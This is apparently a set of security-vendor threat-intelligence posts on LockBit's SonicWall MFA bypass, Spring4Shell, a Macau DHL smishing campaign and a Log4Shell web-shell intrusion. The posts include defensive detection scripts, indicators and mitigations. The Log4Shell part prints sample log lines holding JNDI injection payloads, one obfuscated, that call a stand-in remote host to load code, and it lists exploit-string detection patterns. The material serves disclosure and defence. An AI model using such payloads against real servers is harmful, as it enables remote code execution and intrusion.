Lockbit 2.0 affiliate’s new SonicWall exploit bypasses MFA

Increasing Capabilities of LockBit 2.0 Gang Per Our Incident Response Experience in Q1 2022 Impacts Over One Hundred Hong Kong and Macau Organisations; Exploit Acknowledged by SonicWall as CVE-2022-22279

In the first quarter of 2022, DarkLab responded to several ransomware incidents impacting organisations in the financial services, real estate, and manufacturing sectors across Hong Kong, China and Asia Pacific. In all such incidents, the presence of the LockBit executable file, .lockbit extension files, and the StealBit malware suggests that affiliates of the cybercriminal group that operates the LockBit 2.0 Ransomware-as-a-Service (RaaS) were likely behind the incidents.

LockBit 2.0 RaaS is a well-documented group with established tactics, techniques and procedures (TTPs) that has been active since 2019.[1] During our incident response investigations, we found LockBit affiliates exploiting two victims’ SonicWall Secure Remote Access (SRA) Secure Sockets Layer Virtual Private Network (SSLVPN) appliance to establish a foothold in their networks. In the first instance, the affiliate exploited a known SQL injection (SQLi) vulnerability to obtain valid usernames and passwords. Given the multi-factor authentication (MFA) access control was not enabled, they were able to achieve initial access relatively easily. In the second instance, the affiliate performed follow-up actions to retrieve the time-based one-time password (TOTP) which enabled the circumvention of the MFA access control.

In this blog post we will report on their novel technique to exploit SonicWall SSLVPN appliances and bypass MFA. According to results from open source internet search engines, over one hundred Hong Kong and Macau organisations may be susceptible to this exploit based on their reported use of potentially vulnerable appliances. This exploit disclosed by DarkLab has since been acknowledged by SonicWall as CVE-2022-22279.

A second blog post will then outline the LockBit affiliates’ TTPs as observed in our incident response experience. The final blog post will explore the potential factors that enable the LockBit RaaS group to continue innovating at a rapid pace and cement their position as a major player in the ransomware threat landscape.

Initial Access

The typical modus operandi of LockBit 2.0 affiliates is to gain access to a victim network by exploiting known vulnerabilities of public-facing services, including vulnerable SSLVPN. In particular, CVE-2018-13379 [2] has been the preferred vulnerability in many incidents, including those DarkLab responded to in January and February 2022. The vulnerability is several years old, and LockBit 2.0 affiliates were still able to capitalise on the exploit, which allows unauthenticated users to download system files through crafted HTTP resource requests. Other affiliates have been reported to gain initial access by conducting Remote Desktop Protocol (RDP) brute forcing[3] or through purchasing access to compromised servers via underground markets.[4]

However, in two incidents that DarkLab responded to in March 2022 we observed a new infection vector.  Affiliates were observed to exploit a known but relatively obscure SQLi vulnerability – either CVE-2019-7481 [5] or CVE-2021-20028 [6] – in a novel manner to retrieve user session data stored in the SonicWall SSLVPN appliance to the affiliate’s local endpoint. Retrieved data included valid usernames, passwords, and the TOTP. In doing so, the affiliates could circumvent the MFA access control, impersonate any user to gain initial access, and subsequently deploy ransomware.

Figure 1 – LockBit’s initial attack chain

The latter incidents we responded to in March 2022 were noteworthy for two reasons. First, LockBit affiliates were not reported to have exploited SonicWall SSLVPN products in the past. Second, this was the first publicly observed instance of the known SQLi vulnerability being exploited by threat actors to extract the TOTP SHA-1 tokens of onboarded users. Affiliates could then generate the QR code containing the required information to generate one-time passwords (OTP) in an authenticator app of their choice.[7] This proved to be an innovative way to circumvent the existing MFA access controls. The observation of the exploitation suggests the affiliates of LockBit now have additional tools in their arsenal, and indicates the importance they place on continuous improvement as the group looks to differentiate itself from competitors.

Impact to Hong Kong and Macau

DarkLab replicated and verified the novel exploitation method of the post-authentication vulnerability through internal testing of several known impacted SonicWall SSLVPN firmware. We have shared all relevant details, including the technical exploit code, with the SonicWall Product Security Incident Response Team (PSIRT) in March 2022 to ensure organisations are protected. We will not publicly disclose exact exploitation details to avoid replication by malicious actors.

Per subsequent communications with SonicWall PSIRT, we understood that the upgrades to SonicWall SMA firmware or above, and or above in February 2021 to address CVE-2021-20016 included comprehensive code-strengthening that proactively prevented malicious attackers from exploiting this vulnerability to circumvent the MFA access control.[8] On 12 April 2022, SonicWall PSIRT released the following advisory acknowledging the vulnerability CVE-2022-22279 which we had disclosed.[9]

As of the time of writing, we have not observed from our deep and dark web monitoring any specific intentions by threat actors to leverage this post-authentication vulnerability to target organisations in Hong Kong and Macau. However, we observed that Russian-speaking threat actors had been discussing this vulnerability in early February 2022, with posts from two underground forums – exploit[.]in and xss[.]is – containing conversation details of purchasing the exploit code and outlining at a high level the follow-up actions that can be taken to extract the TOTP from the active sessionid.

Figure 2 – Screenshot of exploit[.]in underground forum
Figure 3 – Screenshot of xss[.]is underground forum

As a result of the LockBit incidents and various hacker chatter, we were concerned that local organisations may have missed SonicWall PSIRT’s advisory note; after all, we still observed compromises that resulted from the exploitation of CVE-2018-13379 on unpatched Fortinet SSLVPN appliances in February 2022. To that end, we conducted a passive, non-intrusive scan for both CVE-2019-7481 and CVE-2021-20028 across the full Internet Protocol (IP) address range of Hong Kong and Macau. The preliminary results indicated that at least 100 organisations were vulnerable to CVE-2021-20028, with half of those also vulnerable to CVE-2019-7481.

DarkLab has since proactively contacted dozens of potentially affected organisations to alert them to the potential risks they face. However, given that a series of critical vulnerabilities pertaining to SonicWall SSLVPN appliances was released in June 2021, it is likely that those may be exploited through other innovative methods by threat actors. For example, the Cybersecurity & Infrastructure Security Agency (CISA) listed CVE-2021-20016 as another SQLi vulnerability that allows a remote unauthenticated attacker to perform a SQL query to access username, password and other session-related information in SMA100 build version 10.x,[10] which aligned with our communication with SonicWall’s PSIRT. We foresee that, if left unpatched, this could pose a threat that adversaries may exploit to gain unauthorised access.

| CVE Number | Product | Vulnerability Name | Date Added to Catalogue | Short Description |
| --- | --- | --- | --- | --- |
| CVE-2021-20021 | SonicWall Email Security | Privilege Escalation Exploit Chain | 3 November 2021 | A vulnerability in version 10.0.9.x allows an attacker to create an administrative account by sending a crafted HTTP request to the remote host. |
| CVE-2021-20022 | SonicWall Email Security | Privilege Escalation Exploit Chain | 3 November 2021 | A vulnerability in version 10.0.9.x allows a post-authenticated attacker to upload an arbitrary file to the remote host. |
| CVE-2021-20023 | SonicWall Email Security | Privilege Escalation Exploit Chain | 3 November 2021 | A vulnerability in version 10.0.9.x allows a post-authenticated attacker to read an arbitrary file on the remote host. |
| CVE-2021-20016 | SonicWall SSLVPN SMA100 | SQL Injection Vulnerability | 3 November 2021 | A vulnerability in SMA100 build version 10.x allows a remote unauthenticated attacker to perform SQL query to access username, password and other session related information. |
| CVE-2021-20018 | SMA 100 Appliances | Stack-Based Buffer Overflow Vulnerability | 28 January 2022 | SonicWall SMA 100 devices are vulnerable to an unauthenticated stack-based buffer overflow vulnerability where exploitation can result in code execution. |
| CVE-2021-20028 | SonicWall SRA | SQL Injection Vulnerability | 28 March 2022 | SRA products contain an improper neutralisation of a SQL Command leading to SQL injection. |
Table 1 – CISA known exploited vulnerabilities catalogue listing various critical SonicWall CVEs that were being exploited in the wild as of 2 April 2022

The ongoing evolution of TTPs allowed LockBit’s affiliates to become the most prolific ransomware actors in 2022. Between 1 January and 31 March 2022, the group claimed 223 victims on their dark web leak site, compared to Conti’s 125. This equates to more than one-third of all known ransomware incidents for Q1 2022. To put it another way, over the same period LockBit’s affiliates claimed almost 10 percent more victims than the other 24 known ransomware groups combined (223 compared to 164). LockBit’s reported activities have also increased over the course of the first three months of 2022. The gang claimed 112 victims in March, while it published details of 111 companies in the previous two months combined. This suggests an ongoing trend highlighting how LockBit will likely remain the most active ransomware-as-a-service offering for the coming months.

Figure 4 – Number of victims published on ransomware dark web leak sites between 1 January 2022 and 31 March 2022


Lockbit 2.0 affiliates work on behalf of the Lockbit group to conduct ransomware campaigns against organisations and industries across the globe. The affiliates’ abilities to conduct the intrusion and execution of Lockbit 2.0 ransomware vary, and through these incidents we observed affiliates with a diversified capability and skillset exploit a known SQLi vulnerability in a novel way to circumvent the MFA access control and obtain initial access. At least 100 organisations in Hong Kong and Macau are at potential immediate risk, and we foresee that if left unpatched, this could pose a threat that adversaries may exploit to gain unauthorised access through exploitation of this vulnerability. We will continue to monitor the situation and assist organisations as needed. In the next blog post, we will also share further details on the TTPs leveraged by LockBit affiliates as a result of our recent incident response experience with reference to the MITRE ATT&CK Framework, such that organisations can better prevent and detect malicious activities related to this RaaS group.


For organisations that have deployed vulnerable versions of SonicWall SRA SSLVPN, we recommend taking the following actions immediately, in this order:

  • Upgrade legacy SRA SSLVPN device(s) running firmware 8.x given they are not supported by SonicWall; apply patches to the impacted versions of the 9.x or 10.x firmware.
  • Reset the Active Directory credentials of all user accounts that had previously authenticated via the SonicWall SRA SSLVPN. In particular, the Active Directory credential that is tied to the SonicWall SRA device for authentication purposes should be changed.
  • Re-bind users’ second authentication factor (e.g., Google or Microsoft Authenticator) app with an updated TOTP, and ensure that users store their newly generated backup codes securely.[11]
  • Review the privileges granted to the Active Directory account tied to the SonicWall SRA device for user authentication purpose, and remove excess permissions where possible to adhere to the principle of least privilege. In general, Domain Administrator privilege should not be used.
  • Perform a review of access management with respect to identity and network access (e.g., removal of legacy and unused accounts, housekeeping of privileges for all accounts, and enforcing network segmentation to tighten access to key servers).

Meanwhile, defending against undisclosed exploits is extremely challenging, but not impossible if organisations adopt a defense-in-depth approach. The following guiding principles should be observed:

  • Require multi-factor authentication for all services to the extent possible, especially on external remote services. 
  • Implement a robust threat and vulnerability management programme that leverages cyber threat intelligence to achieve a resilient security posture. Specifically:
    • Maintain regular cybersecurity patching hygiene practices, including a robust baseline that patches known exploited vulnerabilities and aims to reduce the known attack surface.
    • Leverage cyber threat intelligence to prioritise the remediation scale and timeline on a risk-based approach, through the incorporation of indications and warnings regarding trending threats per available proof-of-concept code, active exploitation by threat actors, and Darknet chatter.
  • Maintain “tertiary” offline backups that are encrypted and immutable (i.e., cannot be altered or deleted). These should be on top of your existing secondary data backups, which should adopt security best practices, in particular network segmentation from your production and/or primary site.
  • Develop and regularly test the business continuity plan, ensuring that the entire backup, restoration and recovery lifecycle is drilled to ensure the organisation’s operations are not severely interrupted.


We include the observed MITRE ATT&CK tactics and techniques elaborated from part one of the blogpost. We will expand this list as we deep-dive into the affiliates’ TTPs as observed from our incident response experience in Q1 2022.

  • Initial Access: Exploit Public-Facing Application (T1190)
  • Initial Access: Valid Accounts (T1078)
  • Impact: Data Encrypted for Impact (T1486)

Indicators of Compromise (IoCs)

We include the observed IoCs elaborated from part one of the blogpost. We will expand this list as we deep-dive into the affiliates’ TTPs as observed from our incident response experience in Q1 2022.

| Indicator | Type |
| --- | --- |
| LockBit_9C11F98C309ECD01.exe | Executable File |
| .lockbit | Encrypted Files Extension |
| 91.219.212[.]214 | IPv4 Address |
| 5.206.224[.]246 | IPv4 Address |
| 51.91.221[.]111 | IPv4 Address |
| 213.186.33[.]5 | IPv4 Address |
| 194.195.91[.]29 | IPv4 Address |

Feel free to contact us at [threatintel at darklab dot hk] for any further information.

Thousands of organisations in Hong Kong and Macau impacted by Spring Core Remote Code Execution Vulnerability

Impacted organisations include financial services and critical infrastructure providers

On 29 March 2022, security researchers posted a now-removed screenshot to Twitter purporting to show a trivially exploited unauthenticated remote code execution (RCE) vulnerability in the Spring Framework, one of the most popular Java frameworks in use globally.[1] While the screenshot did not include a proof of concept or public details, proofs of concept dubbed “SpringShell” or “Spring4Shell” have emerged since 30 March 2022 and have been validated by DarkLab to be working exploits.[2]

The Spring Framework is among the most widely used lightweight open source frameworks for Java, as a result of a design philosophy that lets developers focus on business logic while simplifying the development cycle of Java enterprise applications.[3] Given its widespread use globally, and the general nature of the vulnerability (there may be additional, as yet unknown ways of exploiting it), the impact of this vulnerability is compounded significantly and would be in excess of the impact observed for infamous vulnerabilities such as Log4Shell (CVE-2021-44228).

Technical Analysis

Based on analysis of consolidated data sources and our own technical testing, DarkLab has been able to recreate the attack in a simulated environment. To exploit this vulnerability, an unauthenticated attacker must send a crafted HTTP request that abuses the framework’s parameter-binding mechanism, with calls to specific Java ‘classLoader’/’pipeline’ functions, to achieve an arbitrary file write. It is likely that the Spring Framework does not handle these calls properly, allowing a JSP web shell to be written to the root directory of the server, which can then be interacted with for unauthenticated remote code execution.

Figure 1 – redacted screenshot of successful simulated exploitation of RCE vulnerability that landed us a JSP web shell at the backend server

DarkLab has been actively performing discovery using our proprietary PoC since 30 March 2022. As a result of conducting the scan across all external-facing applications in Hong Kong and Macau, we observed that thousands of organisations – including financial services and critical infrastructure providers – are potentially vulnerable to the unauthenticated RCE vulnerability. At the time of writing, the scope of impacted organisations and the broader implications of exploitation are still being estimated and not fully known, as it depends on whether particular functions are used within the Spring application.[4] The general nature of the vulnerability implies there may be other still undiscovered methods to exploit it.

Probability of Exploitation by Threat Actors

Given that this is an unauthenticated RCE vulnerability in the widely-adopted Spring Framework, it is likely that it will present an attractive exploit for a variety of threat actors to weaponize and add to their arsenal for the purpose of obtaining initial access to unsuspecting victims’ systems.

Per DarkLab’s Deep and Dark Web monitoring, we observed on 29 March 2022 that English-speaking threat actors had exchanged messages via Telegram requesting working exploit code. While we are unable to ascertain with confidence whether they obtained this information through the exchange, we observed clear intent from these threat actors to leverage the unauthenticated RCE vulnerability to perform malicious activities against a specific range of targets. This includes exfiltrating sensitive personally identifiable information from South Asian state-owned enterprises, which suggests that these threat actors have a more targeted mindset and are capable of directing their attention to the observed vulnerable organisations in Hong Kong and Macau should it align with their objectives.

While there has not been active exploitation in the wild for Spring4Shell, we posit that threat actors of various objectives – ranging from espionage to financial motivation – will continue to invest resources to explore how best to weaponise the vulnerability to achieve their goals. DarkLab will continue to monitor the Deep and Dark Web for more insights on their innovations and targeting and provide updates as necessary.


In summary, this unauthenticated RCE vulnerability in the widely-adopted Spring Core makes it an attractive proposition for threat actors of all profiles and motivations. In particular, the general nature of the vulnerability implies there may be other ways to exploit it. As a result, we expect threat actors of all motivations will invest resources to innovate new techniques; until then, detection opportunities will remain limited. This implies that teams should first rely on their defense-in-depth security controls to mitigate the known risks, while continuing to track the status of this vulnerability regarding preventive and detective controls as they become publicly available.


Organisations using affected versions 5.3.x should upgrade to 5.3.18+, while versions 5.2.x should upgrade to 5.2.20+. However, there are other workaround solutions for applications that cannot upgrade to the above versions as listed on the Spring blog post.[5]

From a detection perspective, exploitation attempts will require HTTP requests making use of Java classes. As such, filtering for strings such as “class.”, “Class.”, “.class.”, and “.Class.” may detect exploitation attempts.
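The string filter above can be turned into a log check. What follows is an added example written for this post, not DarkLab’s own detection logic or anything from the Spring project: it parses constructed access-log lines (the trailing `body=` field is an assumed convention for a server that logs POST bodies) and flags requests whose URL-decoded query or body parameter names contain “class.”, matched case-insensitively so that the “Class.”, “.class.” and “.Class.” variants are all covered. It goes one step beyond the text by percent-decoding parameter names before matching, and includes a benign `classes=` parameter to show what the check should not fire on.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines (combined-log style, plus an assumed "body=" field holding the
# POST body). They are illustrative, not traffic from the scans described in the post.
SAMPLE_LOG = """\
10.0.0.5 - - [31/Mar/2022:10:15:01 +0000] "GET /app/index.html?page=1 HTTP/1.1" 200 512 body=
10.0.0.9 - - [31/Mar/2022:10:15:07 +0000] "POST /app/user HTTP/1.1" 200 12 body=class.module.classLoader.foo=bar
10.0.0.9 - - [31/Mar/2022:10:15:09 +0000] "GET /app/user?Class.Module.ClassLoader.foo=bar HTTP/1.1" 400 0 body=
10.0.0.9 - - [31/Mar/2022:10:15:11 +0000] "GET /app/user?%63lass%2Emodule.x=1 HTTP/1.1" 400 0 body=
10.0.0.7 - - [31/Mar/2022:10:16:00 +0000] "GET /app/classic.html?classes=3 HTTP/1.1" 200 800 body=
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ body=(?P<body>.*)$'
)

# The marker from the post; ".class." and the capitalised forms are covered by
# substring matching on the case-folded, URL-decoded parameter name.
MARKER = "class."


def suspicious_params(target, body):
    """Return the decoded query/body parameter names that contain the marker."""
    names = [k for k, _ in parse_qsl(urlsplit(target).query, keep_blank_values=True)]
    names += [k for k, _ in parse_qsl(body, keep_blank_values=True)]
    return [n for n in names if MARKER in n.casefold()]


def scan_log(text):
    """Parse each access-log line and collect the requests with suspicious parameters."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected format; a real deployment would count these
        params = suspicious_params(m["target"], m["body"])
        if params:
            hits.append({"src": m["src"], "ts": m["ts"], "method": m["method"],
                         "target": m["target"], "params": params})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ts"], hit["src"], hit["method"], hit["target"], hit["params"])
```

Matching on parameter names rather than on the raw request line keeps the filter aligned with how the binding is triggered and avoids firing on page paths such as `classic.html`; a raw substring grep for the four strings is the quicker but noisier alternative.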

In addition, we strongly urge our clients to consider the following:

  • Review their application stack to ascertain the scope of impact in preparation for the impending patch to be released.
  • Monitor the official Spring vulnerability report [6] or Git repository for further updates to the patch releases and apply accordingly.[7]
  • Leverage cyber threat intelligence to monitor for further updates to the threat landscape as a result of new information pertaining to the unauthenticated RCE vulnerability.


  • Initial Access: Exploit Public-Facing Application (T1190)
  • Execution: Exploitation for Client Execution (T1203)
  • Persistence: Server Software Component – Web Shell (T1505.003)
  • Command and Control: Application Layer Protocol – Web Protocols (T1071.001)

Feel free to contact us at [threatintel at darklab dot hk] for any further information.

Smells SMiShy to me…

Macau SMS Phishing Unveils Threat Actor Close to Home

On 2 March 2022, DarkLab observed SMS phishing (smishing) activity targeting mobile users in Macau. The message masqueraded as the courier service DHL delivering a package to the victim. The intended purpose was to steal victims’ credentials, personally identifiable information (PII), and credit card details.

Smishing campaigns making fraudulent use of the DHL brand are far from uncommon.[1] Indeed, the Macau Polícia Judiciária issued a notice on 24 February 2022 to warn citizens about fraudsters masquerading as counterfeit courier companies to trick victims into providing their personal information.[2]

However, we were interested in this case as the threat actor behind it had also registered several fake domains masquerading as other reputable companies in Hong Kong and Singapore, such as Hongkong Post and Singapore Post. While we are used to phishing and smishing campaigns globally, when this happens in our virtual backyard it draws our attention as it can pose a real threat to users in Hong Kong, Macau, and Singapore.

Smishing Incident in Macau

The initial malicious SMS message came from a sender named INFO. Recipients are requested to click the provided hyperlink to reschedule the package pick-up date and time as the previous attempt was not delivered successfully.

Figure 1 – Initial SMS phishing message sent to the victim
Figure 2 – Image displaying the fraudulent delivery status

Once the victim has opened the link, a page appearing to be Hong Kong DHL Express displays a phony delivery schedule page with free text fields that the recipient is supposed to complete to schedule a delivery time. Information requested includes the user’s full name, contact number, residential address, city, and postal code.

Figure 3 – image of the phony page requesting that the victim input their credentials

After inputting the personal information and clicking the submit button, the victim is redirected to another page that requires them to select their preferred delivery option.

Figure 4 – fraudulent DHL HK page asking victims to proceed to the payment card page

Upon selecting the preferred delivery option, the fraudulent DHL HK site requests that the victim input financial information, including name, credit card number, expiration date, and CVV number. Once in possession of users’ payment card details, criminals can resell them online or conduct financial fraud themselves.

Figure 5 – Final page designed to capture the victims’ credit card details

Something Smelt Smishy…

The risk of smishing has increased at an alarming rate as a result of the Covid-19 pandemic. While this is not entirely a new trend, we observed that the messages are becoming increasingly deceptive as they look to trick victims into providing their personal information.

What threw us off was the fact that the URL within the smishing text redirected users to hongkong-post[.]net/918srx, which resolved to a Russian IP address – 31[.]28[.]27[.]151 – hosting the fake DHL site. The same IP address also hosted the domain dhl-post[.]hk. Both malicious domains and their associated SSL certificates were created after 28 February 2022, just a few days before the beginning of the smishing campaign.

Additionally, hongkong-post[.]net had mail exchanger (MX) records, which suggested the threat actors’ intent to send and/or receive emails.[3] We also saw MX records for another domain, singapore-post[.]com, hosted on the same IP address and created on 7 March 2022. Overall, the existence of young domains with MX records mimicking legitimate brands is a strong indication of likely phishing intent, which security teams should be monitoring for.
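The “young domain with MX records mimicking a brand” indicator can be expressed as a small scoring routine. The following is an added example written for this post, not DarkLab’s monitoring tooling: the domain records are constructed (the creation dates and MX flags are sample values modelled on the observations above, not live WHOIS or DNS data), the brand watch-list is an assumption, and the check generalises the text slightly by also catching one-character misspellings such as aididas via edit distance.

```python
from datetime import date

# Assumed brand watch-list, normalised (lowercase, hyphens removed).
BRANDS = ["hongkongpost", "singaporepost", "dhl", "adidas"]

# Constructed records modelled on the post's observations; dates and MX flags are sample values.
RECORDS = [
    {"domain": "hongkong-post[.]net", "created": date(2022, 2, 28), "has_mx": True},
    {"domain": "singapore-post[.]com", "created": date(2022, 3, 7), "has_mx": True},
    {"domain": "dhl-post[.]hk", "created": date(2022, 2, 28), "has_mx": False},
    {"domain": "aididas[.]com[.]hk", "created": date(2022, 3, 1), "has_mx": False},
    {"domain": "example-corp[.]com", "created": date(2015, 6, 1), "has_mx": True},
]

REVIEW_DATE = date(2022, 3, 8)  # the "as of" date used in the post's pivoting


def brand_label(domain):
    """Left-most label of a (possibly defanged) domain, normalised for comparison."""
    refanged = domain.replace("[.]", ".").lower()
    return refanged.split(".")[0].replace("-", "")


def levenshtein(a, b):
    """Edit distance; catches one-character typosquats such as 'aididas' vs 'adidas'."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def matched_brand(label, brands, max_distance=1, min_len=5):
    """Brand the label imitates: exact containment first, then a near-miss spelling."""
    for brand in brands:
        if brand in label:
            return brand
    if len(label) >= min_len:  # distance 1 on very short labels is meaningless
        for brand in brands:
            if levenshtein(label, brand) <= max_distance:
                return brand
    return None


def assess(record, today, brands=BRANDS, max_age_days=30):
    """One point each for brand imitation, recent registration, and MX presence."""
    reasons = []
    brand = matched_brand(brand_label(record["domain"]), brands)
    if brand:
        reasons.append(f"imitates {brand}")
    age_days = (today - record["created"]).days
    if age_days <= max_age_days:
        reasons.append(f"registered {age_days} days ago")
    if record["has_mx"]:
        reasons.append("has MX records")
    return {"domain": record["domain"], "score": len(reasons), "reasons": reasons}


def prioritise(records, today, min_score=2):
    """Records worth an analyst's attention, highest score first (stable for ties)."""
    assessed = [assess(r, today) for r in records]
    return sorted((a for a in assessed if a["score"] >= min_score), key=lambda a: -a["score"])


if __name__ == "__main__":
    for item in prioritise(RECORDS, REVIEW_DATE):
        print(item["domain"], item["score"], "; ".join(item["reasons"]))
```

The three signals are deliberately additive rather than any one being decisive: an old brand-named domain with MX is usually the brand itself, and a young domain without a brand match is just noise, but a young brand-lookalike that is already set up to send mail is exactly the profile described above.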

The historical WHOIS lookup for the domains revealed that the registrar company is NiceNIC INTERNATIONAL GROUP CO., LIMITED (NiceNIC.NET) based in Hong Kong.[4] While pivoting through the Registrar Name and NiceNIC.NET’s Chinese company name “耐思尼克國際集團有限公司”, we observed 21 additional domains associated with this registrar as of 8 March 2022. At least four of the domains (xjam[.]hk, canadahq[.]hk, kaddafi[.]hk, and aij[.]hk) were flagged by security scanners as likely malicious. Furthermore, there were newly registered domains (aididas[.]com[.]hk) that were not yet flagged by security scanners, though strongly looked like a fraudulent website.

Meanwhile, we also observed that canadahq[.]hk had resolved to a known-bad Russian IP address, 185[.]178[.]208[.]186, which hosted files for download of the Trojan “Win32.Trojan.Raasj.Auto”. This Trojan was first observed in 2017 per various open source threat exchange platforms,[5] and there are various web posts elaborating its impacts on victims.

In one instance, the Trojan is described as spyware that steals sensitive information such as credit card details and passwords for sale and profit.[6] In another, the Trojan was deemed to have been altered and linked to the “Trojan-Ransom.Win32.Shade.Ino” ransomware that cybercriminals deliver via phishing emails to conduct online fraud. The ransomware ciphers documents on the hard drive and prevents normal access to the victim’s workstation, with a ransom note locatable on the local drive upon reboot that demands payment to decipher the data.[7] A third web post noted that the “Win32.Trojan.Raasj.Auto” Trojan would hijack victims’ web browsers to cause web redirection issues and slow down overall system and network performance.[8]

Overall, the links to relatively low-level malware suggest a financially motivated campaign spanning multiple years and only recently focusing on Hong Kong and South East Asian targets.

Figure 6 – Pivoting out from 耐思尼克國際集團有限公司 to identify further known-bad malicious domains and IP addresses, along with the Trojan “Win32.Trojan.Raasj.Auto”


Through a Macau smishing campaign, we were able to uncover a wider campaign targeting Hong Kong, Macau, and Singapore and involving a network of malicious Hong Kong domains registered by the same local registrar. A specific domain had a resolution history to a Russia-based IP address reportedly linked to Trojans used since at least 2017, suggesting it was likely rented by or associated with multiple cybercriminal threat actors. Our assessment is reinforced by the fact that the original domain exploited for smishing, dhl-post[.]hk, was hosted by a Russian server, which is a relatively rare occurrence in Hong Kong.


While phishing and smishing abusing legitimate brands will remain a problem, companies can take action to mitigate and prevent the threat they pose.

  • Organisations should update their email security solution and network devices (including external firewalls and web proxies) to detect potential inbound/outbound connections from the known-bad domains and IP addresses in this post.
  • Users should remain wary of the legitimacy of webpages and their branding, and access websites via the global webpage as opposed to the URL shortened link if in doubt. Impacted companies should issue circulars and alerts as necessary when impersonation attempts are detected.
  • Organisations should conduct young-domain monitoring and alert on potentially suspicious domains for further action. This task is typically conducted by our Security Operations Centre for subscription clients. We have already informed both DHL and Hongkong Post to investigate and, if necessary, perform takedowns of the fake domains dhl-post[.]hk and hongkong-post[.]net.
  • Registrars should enhance their onboarding due diligence to reduce the risk of provisioning domains that impersonate legitimate brands, and should regularly review the activities of those domains to ensure their use for ethical and non-malicious purposes.


  • Initial Access: Phishing (T1566)
  • Initial Access: Phishing: Spearphishing Link (T1566.001)
  • Execution: User Execution (T1204)
  • Credential Access: Input Capture – Web Portal Capture (T1056.003)
  • Collection: Input Capture (T1056)
  • Collection: Browser Session Hijacking (T1185)
  • Exfiltration: Automated Exfiltration (T1020)
  • Impact: Data Encrypted for Impact (T1486)
  • Impact: Account Access Removal (T1531)
  • Impact: Endpoint Denial of Service (T1499)

Indicators of Compromise (IOCs)

• hxxps://hongkong-post[.]net/e/authID=UEjJc/tracking.php?sessionid=4g3ihd1ej09+6b+27fc58arSZF+27+5p9Ba8+D6Y+Gg3ok+4+1uIEOgCLfMSPmNKwbHwTAaX+J42951997505
• dhl-post[.]hk
• hongkong-post[.]net
• singapore-post[.]com
• xjam[.]hk
• canadahq[.]hk
• kaddafi[.]hk
• aij[.]hk
• aididas[.]com[.]hk
• 31[.]28[.]27[.]151
• 185[.]178[.]208[.]186

Feel free to contact us at [threatintel at darklab dot hk] for any further information.

A look Behinder the scene

Popular web shell exploited after Log4Shell for data theft

DarkLab recently responded to an incident affecting a Hong Kong organisation in the retail sector. Threat actors exploited the vulnerability CVE-2021-44228 in the Apache Log4j library, also known as Log4Shell, as the initial infection vector. While we have observed multiple attempted exploitations of Log4Shell against our Managed Security Service clients since its initial reveal on 10 December 2021, this was the first instance where we observed Log4Shell exploited in a prolonged network intrusion whose aim was not the typical crypto-mining or ransomware deployment for financial gain.

After initial access via Log4Shell, the actor dropped the Behinder web shell on the victim’s public-facing web servers. They exploited this access sporadically over a period of 51 days to retrieve additional information from backend database servers, which led to an increase in network activity and their subsequent discovery.

Initial access and web shell deployment  

Log4Shell is a software vulnerability in Apache Log4j 2, a popular Java library used to extend logging capabilities in applications. The vulnerability enables a remote attacker to execute arbitrary code and take control of a device running vulnerable versions of Apache Log4j 2.

In this instance, we observed that the adversary performed manual probing to identify an entry point in the login page of a victim’s public-facing web server. The adversary spent several hours repeatedly interacting with the vulnerable webpage. Such prolonged interaction with the identified target suggests the attackers were not just running automated scripts, as we have seen many opportunistic threat actors do, but rather had a degree of interest in compromising this victim.

# Entry in Nginx
x.x.x.x - - [1/Jan/2022:08:00:00 +0000] "POST /login/logincheck HTTP/1.1" 302 0 "https://www.victim.com/victim/login" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36" "x.x.x.x"
# Corresponding entry in Apache Log4j log
INFO | jvm 1 | main | 2022/01/01 08:00:00.130 | org.app.victim.UnhandledException: Invalid id '${jndi:rmi://x.x.x.x:1099/oHg5SJ}'
INFO | jvm 1 | main | 2022/01/01 08:00:00.433 | org.app.victim.UnhandledException: Invalid id '${jndi:rmi://x.x.x.x:1099/oHg5SJ}'

Fig 1 – log sample showing threat actors’ exploitation attempt. The sample has been sanitised to maintain the victim’s anonymity.
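The log excerpt above is exactly what a detection should key on: the application logged the attacker-supplied lookup string verbatim, so a scan of the Log4j log for JNDI lookups recovers both the attempt and the callback host and port the JVM was asked to contact. The following detector is an added example written for this post, not DarkLab tooling or code from the incident; the sample lines are constructed to mirror the sanitised excerpt, and the second sample adds the nested-lookup obfuscation (`${lower:j}`) that public detection rules commonly unwrap, which is why the scanner normalises wrappers before matching.

```python
import re

# Constructed sample lines modelled on the sanitised excerpt above; they are not the victim's logs.
SAMPLE_LOG4J_LINES = [
    "INFO | jvm 1 | main | 2022/01/01 08:00:00.130 | org.app.victim.UnhandledException: "
    "Invalid id '${jndi:rmi://x.x.x.x:1099/oHg5SJ}'",
    "INFO | jvm 1 | main | 2022/01/01 08:00:00.433 | org.app.victim.UnhandledException: "
    "Invalid id '${${lower:j}ndi:ldap://x.x.x.x:1389/a}'",
    "INFO | jvm 1 | main | 2022/01/01 08:01:12.001 | org.app.victim.LoginController: "
    "user alice logged in",
]

# Log4j lookup wrappers that are nested around the string to defeat naive matching:
# ${lower:j} / ${upper:j} resolve to "j", and ${anything:-j} resolves to its default "j".
_CASE_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.I)
_DEFAULT_WRAPPER = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# The lookup itself: the scheme and the host:port a vulnerable JVM would connect to.
_JNDI_LOOKUP = re.compile(
    r"\$\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba)://([^/}\s]+)", re.I)


def normalise(text: str) -> str:
    """Collapse nested lookup wrappers until the string stops changing."""
    previous = None
    while previous != text:
        previous = text
        text = _CASE_WRAPPER.sub(lambda m: m.group(1), text)
        text = _DEFAULT_WRAPPER.sub(lambda m: m.group(1), text)
    return text


def find_jndi_lookups(line: str):
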